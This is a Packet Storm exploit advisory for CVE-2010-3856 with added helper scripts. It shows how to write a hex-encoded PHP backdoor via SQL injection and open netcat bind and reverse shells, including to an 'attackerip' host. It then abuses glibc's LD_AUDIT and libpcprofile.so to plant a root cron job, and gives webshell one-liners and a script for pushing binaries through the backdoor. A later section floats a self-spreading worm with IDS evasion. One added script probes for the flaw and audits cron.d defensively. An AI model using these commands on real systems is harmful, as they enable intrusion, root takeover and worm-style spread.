Debian 5.0.6 / Ubuntu 10.04 Webshell To Remote Root

Source: packetstormsecurity.com, PACKETSTORM:95236
Author: jmit
Published: Oct 28, 2010 (2010-10-28 00:00:00)
EPSS: 0.0004 (Low), percentile 0.4%

# Exploit Title: Debian <=5.0.6 / Ubuntu <=10.04 Webshell-Remote-Root
# Date: 24-10-2010  
# Author: jmit  
# Mail: fhausberger[at]gmail[dot]com   
# Tested on: Debian 5.0.6  
# CVE: CVE-2010-3856  
  
--------------  
| DISCLAIMER |  
--------------  
  
# IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE  
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR  
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF  
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS  
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN  
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)  
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE  
# POSSIBILITY OF SUCH DAMAGE.  
  
---------   
| ABOUT |  
---------  
  
Debian/Ubuntu remote-root exploitation example chaining a web shell with the GNU
dynamic linker DSO vulnerability (LD_AUDIT loading libpcprofile.so into setuid
programs, CVE-2010-3856). See http://www.exploit-db.com/exploits/15304/ for the
underlying local exploit. It should work on other Linux distributions with an
unpatched glibc too.
  
--------------  
| BACKGROUND |  
--------------  
  
Typically a web shell (running as user nobody) cannot drop a setuid shell or modify
/etc/passwd directly, so it doesn't get you root on its own. With the DSO vulnerability
we can have commands run as root, and from that root context we can open a socket back
to the attacker or set up a bind shell.
  
-----------   
| EXPLOIT |  
-----------  
  
Once you have found a SQL injection vulnerability you can create a PHP backdoor on disk.
This is typically possible with a SELECT ... INTO DUMPFILE/OUTFILE statement, provided
the database user has the FILE privilege and the target directory is writable by the
MySQL server process. The value written is a simple <? passthru($_GET['c']); ?> backdoor,
hex-encoded so it needs no quoting (it relies on short_open_tag being enabled in PHP).
  
---
-- MySQL: write the backdoor into the web root with INTO DUMPFILE
-- (needs the FILE privilege; the path must be writable by mysqld)
DROP TABLE IF EXISTS `fm`;
CREATE TABLE `fm` (
`fm` longblob
) ENGINE=MyISAM;  -- ENGINE= replaces the obsolete TYPE= syntax
-- 0x3c3f... is the hex encoding of <? passthru($_GET['c']); ?>
insert into fm (fm) values (0x3c3f20706173737468727528245f4745545b2763275d293b203f3e);
select fm from fm into dumpfile '/opt/lampp/htdocs/xampp_backup.php';
drop table fm;
flush logs;
---
  
Now you can reach the server through the backdoor and bootstrap a real connection with
telnet or nc. If the tool you need isn't installed, write the binary through the backdoor
byte by byte, e.g. perl -e 'print "\x41\x42\x43\x44"' or echo -en '\x41\x42\x43\x44'
redirected to a file (the four bytes are a placeholder for the real content). If direct
shell access isn't possible you can also create the binary with PHP fwrite:
  
---  
<?php
// write the raw bytes of a binary to disk through the web shell
$File = "/tmp/nc";
$Handle = fopen($File, 'w');
$Data = "\x41\x42\x43\x44";   // placeholder: replace with the real file contents
fwrite($Handle, $Data);
fclose($Handle);
?>
---  
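The two delivery steps above (the hex literal for the INTO DUMPFILE payload, and pushing a binary through the command backdoor) as an added example that is not part of the original advisory. It assumes only POSIX sh with od, tr, sed and cksum on both sides; the function names, the default 64-byte chunk size and the cksum check are my choices, not the author's, and the octal escapes are used because POSIX printf (dash on Debian) has no \xNN form.

```shell
#!/bin/sh
# Added example, not part of the original advisory. Helpers for the two
# delivery steps: a MySQL hex literal for the INTO DUMPFILE payload, and a
# byte-by-byte upload of a binary through the xampp_backup.php?c= backdoor.
# Assumes POSIX sh plus od, tr, sed and cksum on both ends.

# hex_literal STRING -> 0x... MySQL hex literal, so the payload needs no quoting
hex_literal() {
  printf '0x%s' "$(printf '%s' "$1" | od -An -v -tx1 | tr -d ' \n')"
}

# url_encode STRING -> every byte as %XX, safe as the value of the c= parameter
url_encode() {
  printf '%s' "$1" | od -An -v -tx1 | tr -d '\n' | sed 's/ /%/g'
}

# gen_upload_cmds FILE DEST [CHUNK]
# Emits one shell command per line; each line is one webshell request.
# Octal escapes are used in the printf format string because POSIX printf
# (dash on Debian) has no \xNN escape. The last line prints a checksum to
# compare against `cksum FILE` locally.
gen_upload_cmds() {
  file=$1; dest=$2; chunk=${3:-64}
  n=0; esc=''
  printf ': > %s\n' "$dest"              # create or truncate the target first
  for oct in $(od -An -v -to1 "$file"); do
    esc="$esc\\$oct"                     # e.g. \101 for 'A'
    n=$((n + 1))
    if [ "$n" -eq "$chunk" ]; then
      printf "printf '%s' >> %s\n" "$esc" "$dest"
      n=0; esc=''
    fi
  done
  if [ -n "$esc" ]; then                 # remainder shorter than one chunk
    printf "printf '%s' >> %s\n" "$esc" "$dest"
  fi
  printf 'cksum %s\n' "$dest"
}

# Usage:
#   hex_literal "<? passthru(\$_GET['c']); ?>"
#   gen_upload_cmds ./nc /tmp/nc | while read -r cmd; do
#     echo "http://victimip/xampp_backup.php?c=$(url_encode "$cmd")"
#   done
```

Each emitted line is a complete command for the `c=` parameter; url_encode turns it into a form a scripted client can send verbatim, and the final cksum line lets you confirm the upload matches the local file before you chmod and run it.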
  
Now open one of

Bind-Shell: http://victimip/xampp_backup.php?c=nc -l -p 9999 -e /bin/bash
Reverse-Shell: http://victimip/xampp_backup.php?c=/bin/nc attackerip 9999 | /bin/bash

in your web browser and connect to your shell. The -e option needs a netcat build
that supports it (netcat-traditional on Debian). The reverse-shell variant is one-way:
it feeds commands from the attacker into bash, but bash's output goes into the HTTP
response rather than back over the socket.
  
$ nc victimip 9999  
id  
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)  
  
---  
  
Now let's exploit the DSO vulnerability. You need umask 0 so that the file libpcprofile.so
creates at /etc/cron.d/exploit comes out rw-rw-rw-: the library opens PCPROFILE_OUTPUT
with mode 0666, and the process umask would otherwise strip the group/other write bits.
  
$ umask 0  
  
This is the shell script for the cron.d entry (pick one):

Bind-Shell: $ echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh
Reverse-Shell: $ echo -e '/bin/nc localhost 8888 | /bin/bash' > /tmp/exploit.sh

The reverse-shell variant connects to localhost, so the listener on port 8888 has to be
started on the victim itself, e.g. from the nobody shell.
  
Now make your shellscript executable for cron:  
  
$ chmod u+x /tmp/exploit.sh  
  
Create the rw-rw-rw- file in the cron directory using the setuid ping program. On an
unpatched glibc ld.so honours LD_AUDIT for setuid binaries and loads libpcprofile.so from
the trusted library directory; its constructor creates PCPROFILE_OUTPUT with ping's root
privileges (ping itself just prints its usage and exits):
  
$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping  
  
Have cron run the script as root every minute:
  
$ echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit  
  
Within a minute cron starts your script as root. Cron builds that check file modes will
ignore a world-writable cron.d entry; on the tested Debian 5.0.6 it is honoured. Connect
to the bind shell on the victim:

$ nc victimip 79
id  
uid=0(root) gid=0(root) groups=0(root)  
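An added check, not from the original advisory, covering the procedure above from both sides: a non-destructive probe that reuses the exploit's LD_AUDIT/PCPROFILE_OUTPUT invocation against a path under /tmp instead of /etc/cron.d, and an audit of a cron.d directory for the root-owned, world-writable entry the exploit creates. The probe file name, the output tokens and the function names are assumptions.

```shell
#!/bin/sh
# Added example, not part of the original advisory: a non-destructive probe
# for the LD_AUDIT/libpcprofile.so primitive used above, plus an audit of a
# cron.d directory for the artefact the exploit leaves behind (a root-owned,
# world-writable entry). Probe path and output tokens are assumptions.

# ldaudit_probe: run the exploit's invocation with PCPROFILE_OUTPUT pointing at
# a harmless path and report whether a root-owned file appeared. Prints one of
#   vulnerable      unprivileged run created a file owned by uid 0
#   not-vulnerable  no root-owned file appeared (also when libpcprofile.so is
#                   absent, so treat that case as inconclusive)
#   skipped         running as root, or no setuid-root ping to leverage
ldaudit_probe() {
  probe="/tmp/pcprofile-probe.$$"
  if [ "$(id -u)" -eq 0 ]; then echo skipped; return 0; fi
  ping_bin=$(command -v ping 2>/dev/null) || { echo skipped; return 0; }
  if [ ! -u "$ping_bin" ]; then echo skipped; return 0; fi
  # Same environment as the exploit; ping exits with a usage error, but the
  # audit library's constructor has already run (as root) by then.
  LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="$probe" "$ping_bin" >/dev/null 2>&1 || true
  if [ ! -e "$probe" ]; then echo not-vulnerable; return 0; fi
  owner=$(ls -ln "$probe" | awk '{print $3}')
  rm -f "$probe" 2>/dev/null || true   # fails on a root-owned file in sticky /tmp
  if [ "$owner" = 0 ]; then echo vulnerable; else echo not-vulnerable; fi
}

# cron_d_audit [DIR]: print "<reason> <path>" for every regular file in DIR
# (default /etc/cron.d) that is writable by others (mode bit 002), writable
# by group (020), or not owned by root. /etc/cron.d/exploit as created above
# trips the first two checks.
cron_d_audit() {
  dir=${1:-/etc/cron.d}
  find "$dir" -type f -perm -002 -exec printf 'world-writable %s\n' {} \;
  find "$dir" -type f -perm -020 -exec printf 'group-writable %s\n' {} \;
  find "$dir" -type f ! -user root -exec printf 'not-root-owned %s\n' {} \;
}

# Usage: ldaudit_probe; cron_d_audit /etc/cron.d
```

On a patched glibc the probe prints not-vulnerable because ld.so no longer loads arbitrary audit objects into setuid programs; on current distributions ping usually carries file capabilities instead of the setuid bit, which the probe reports as skipped. The audit is the responder's side of the same story: a cron.d file that anyone can write is a root command-execution path whether or not it got there via this bug.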
  
---------------------
| EXPLOIT one-liner |
---------------------
  
echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh;/bin/chmod 0744 /tmp/exploit.sh;umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping;echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit  
  
$ nc victimip 79
id  
uid=0(root) gid=0(root) groups=0(root)  
  
------------------------------  
| EXPLOIT from webshell only |  
------------------------------  
  
http://victimip/xampp_backup.php?c=echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh  
http://victimip/xampp_backup.php?c=/bin/chmod 0744 /tmp/exploit.sh  
http://victimip/xampp_backup.php?c=umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping  
http://victimip/xampp_backup.php?c=echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit  
  
$ nc victimip 79
id  
uid=0(root) gid=0(root) groups=0(root)  
  
-----------------------------------
| EXPLOIT from webshell one-liner |
-----------------------------------
  
http://victimip/xampp_backup.php?c=echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh;/bin/chmod 0744 /tmp/exploit.sh;umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping;echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit  
  
$ nc victimip 79
id  
uid=0(root) gid=0(root) groups=0(root)  
  
---------  
| IDEAS |  
---------  
  
This looks like a wormable bug. A worm with URL obfuscation (to evade IDS/IPS) searches for
SQLi/blind SQLi or remote code execution bugs, injects the malicious URL, repeats the process
against other IPs, installs a rootkit/bot, and the game is over.
  
  